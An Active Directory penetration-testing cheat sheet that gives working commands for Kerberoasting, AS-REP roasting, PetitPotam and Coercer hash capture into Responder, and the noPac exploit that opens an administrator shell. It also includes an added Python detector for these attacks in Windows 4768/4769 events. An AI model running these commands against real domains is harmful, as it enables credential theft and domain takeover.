Kerberos Attacks
Kerberoasting
Kerberoasting is an attack against service accounts (domain accounts that have an SPN): the service ticket issued for such an account is encrypted with the account's password hash, so an attacker can crack the Active Directory account's password offline. It requires a valid domain user account and password.
Vulnerability detection
PowerView
Import-Module .\PowerView.ps1
Get-DomainUser -SPN
Windows
PowerView
Import-Module .\PowerView.ps1
Invoke-Kerberoast
Rubeus
.\Rubeus.exe kerberoast /nowrap
Linux
impacket-GetUserSPNs -target-domain domain.local -usersfile users.txt -dc-ip dc01.domain.local domain.local/guest -no-pass
AS-REP Roasting
Targets accounts with the "Do not require Kerberos preauthentication" flag set.
Windows
- PowerView Manual
Get-ADUser -filter * -properties DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq "True" -and $_.Enabled -eq "True"} | select Name
- PowerView Auto
Import-Module .\PowerView.ps1
Get-DomainUser -UACFilter DONT_REQ_PREAUTH
- Rubeus
.\Rubeus.exe asreproast /user:full.name /domain:domain.local /dc:dc01.domain.local
Linux
impacket-GetNPUsers domain.local/ -no-pass -request -k -usersfile users.txt
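On the defender's side, both techniques above leave a distinctive trace in the domain controller's Security log: Kerberoasting appears as 4769 (TGS request) events for user service accounts with RC4 (0x17) tickets, typically many SPNs from one client in a burst, and AS-REP roasting appears as 4768 (TGT request) events with PreAuthType 0. The following detection logic, run over constructed sample events, is an added example and not part of the original cheat sheet or any of the tools it lists; the event field names follow the Windows Security log XML for 4768/4769.

```python
"""Flag 4768/4769 events that look like Kerberoasting or AS-REP roasting."""
from collections import defaultdict

RC4_HMAC = "0x17"  # etype 23; AES tickets are 0x11/0x12


def is_user_service(name):
    # Machine accounts end in '$'; krbtgt is requested on every logon.
    return not name.endswith("$") and name.lower() != "krbtgt"


def detect(events, burst_threshold=3):
    """Return (rule, client_ip, detail) tuples for suspicious events."""
    alerts = []
    tgs_by_client = defaultdict(set)  # client IP -> distinct user SPNs hit
    for e in events:
        if (e["EventID"] == 4769 and e["TicketEncryptionType"] == RC4_HMAC
                and is_user_service(e["ServiceName"])):
            alerts.append(("rc4_tgs_user_spn", e["IpAddress"], e["ServiceName"]))
            tgs_by_client[e["IpAddress"]].add(e["ServiceName"])
        elif e["EventID"] == 4768 and e.get("PreAuthType") == "0":
            # A TGT issued without pre-authentication: AS-REP roastable account.
            alerts.append(("asrep_no_preauth", e["IpAddress"], e["TargetUserName"]))
    for ip, services in tgs_by_client.items():
        if len(services) >= burst_threshold:
            alerts.append(("kerberoast_burst", ip, f"{len(services)} SPNs"))
    return alerts


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"EventID": 4769, "ServiceName": "DC01$", "TicketEncryptionType": "0x12",
     "TargetUserName": "alice@DOMAIN.LOCAL", "IpAddress": "10.10.10.50"},
    {"EventID": 4769, "ServiceName": "svc_sql", "TicketEncryptionType": "0x17",
     "TargetUserName": "alice@DOMAIN.LOCAL", "IpAddress": "10.10.10.50"},
    {"EventID": 4769, "ServiceName": "svc_web", "TicketEncryptionType": "0x17",
     "TargetUserName": "alice@DOMAIN.LOCAL", "IpAddress": "10.10.10.50"},
    {"EventID": 4769, "ServiceName": "svc_backup", "TicketEncryptionType": "0x17",
     "TargetUserName": "alice@DOMAIN.LOCAL", "IpAddress": "10.10.10.50"},
    {"EventID": 4768, "ServiceName": "krbtgt", "TicketEncryptionType": "0x17",
     "PreAuthType": "0", "TargetUserName": "jdoe", "IpAddress": "10.10.10.50"},
    {"EventID": 4768, "ServiceName": "krbtgt", "TicketEncryptionType": "0x12",
     "PreAuthType": "2", "TargetUserName": "bob", "IpAddress": "10.10.10.51"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The RC4 rule is noisy in domains that still issue RC4 tickets broadly, so the burst rule (distinct user SPNs per client) is the one worth alerting on; the AS-REP rule is low-noise because normal accounts always pre-authenticate.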
Coerced Authentication
Coercer (rpc)
python3 Coercer.py coerce -d domain.local --target-ip 10.10.10.x -l 10.10.10.x --always-continue
PetitPotam
Setup Responder
sudo responder -I tun0
Run PetitPotam to coerce the victim into authenticating to your Responder listener, which captures the NTLM hash.
Your IP: 10.10.10.x
Victim IP: 10.10.10.y
python3 PetitPotam.py 10.10.10.x 10.10.10.y -u 'svc_user' -p 'password1'
Guest user (empty credentials)
python3 PetitPotam.py 10.10.10.x 10.10.10.y -u '' -p ''
NoPac
Python
faketime -f +7h python3 noPac.py domain.local/user1:'Password1' -dc-ip 10.10.10.x -use-ldap -shell --impersonate administrator
PowerShell
Invoke-noPac
Scan the network
Invoke-noPac -Command "scan -domain domain.local -user user1 -pass Password1"
Add a computer account
Invoke-noPac -Command "-domain domain.local -user winrm_svc -pass test111!! /enctype rc4 /dc dc01.domain.local /mAccount testmachine /mPassword testmachinepass /service cifs /ptt"
noPac
.\noPac.exe scan -domain domain.local -user user1 -pass 'Password1'